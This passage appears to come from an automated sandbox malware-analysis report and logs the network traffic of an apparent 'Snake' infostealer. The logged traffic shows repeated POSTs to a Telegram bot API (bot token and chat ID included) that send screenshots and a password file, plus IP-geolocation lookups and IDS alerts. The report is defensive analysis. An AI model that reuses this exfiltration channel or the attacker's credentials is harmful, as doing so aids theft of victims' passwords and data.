              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcdfde5c1b6637Host: api.telegram.orgContent-Length: 673762
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce00020bde834Host: api.telegram.orgContent-Length: 546Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce01a03cfce7fHost: api.telegram.orgContent-Length: 673762
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce037aeec0960Host: api.telegram.orgContent-Length: 546Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce04d8cc3fdb1Host: api.telegram.orgContent-Length: 665843Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce077de95b00fHost: api.telegram.orgContent-Length: 546Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce0917098e23cHost: api.telegram.orgContent-Length: 673762
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce0c5aec617ddHost: api.telegram.orgContent-Length: 546Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce0e56d11669fHost: api.telegram.orgContent-Length: 673762
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce111bd25bceeHost: api.telegram.orgContent-Length: 546Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce1328b021260Host: api.telegram.orgContent-Length: 673762
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce181c0e6bebeHost: api.telegram.orgContent-Length: 546Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce1b2a2b09d87Host: api.telegram.orgContent-Length: 673762
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce2001d4516aaHost: api.telegram.orgContent-Length: 546Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce2346f070fafHost: api.telegram.orgContent-Length: 673762
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce2bd0102c9b7Host: api.telegram.orgContent-Length: 546Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce31ecada4acaHost: api.telegram.orgContent-Length: 673762
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce3bce5ba22aeHost: api.telegram.orgContent-Length: 546Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce4192c390b17Host: api.telegram.orgContent-Length: 673762Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce4bf04ed34f6Host: api.telegram.orgContent-Length: 546Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce514a3c0d1e8Host: api.telegram.orgContent-Length: 673762
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce5b5bb1434eeHost: api.telegram.orgContent-Length: 546Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce6134f881863Host: api.telegram.orgContent-Length: 673762Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce6b48d37c51aHost: api.telegram.orgContent-Length: 546Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce717d96f9c08Host: api.telegram.orgContent-Length: 673762
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce7e93f309845Host: api.telegram.orgContent-Length: 546Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcea1a8e34fdebHost: api.telegram.orgContent-Length: 673762
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dceb41e16a8b57Host: api.telegram.orgContent-Length: 546Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcecf5324ccbefHost: api.telegram.orgContent-Length: 673762
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd85812adaaee2Host: api.telegram.orgContent-Length: 546Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------91103f4d3b149d7Host: api.telegram.orgContent-Length: 673750Connection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
              Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49709 -> 132.226.247.73:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49714 -> 132.226.247.73:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49705 -> 132.226.247.73:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49721 -> 132.226.247.73:80
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49710 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49719 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49715 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49708 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49723 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49735 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49726 -> 188.114.96.3:443
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49706 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49717 version: TLS 1.0
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
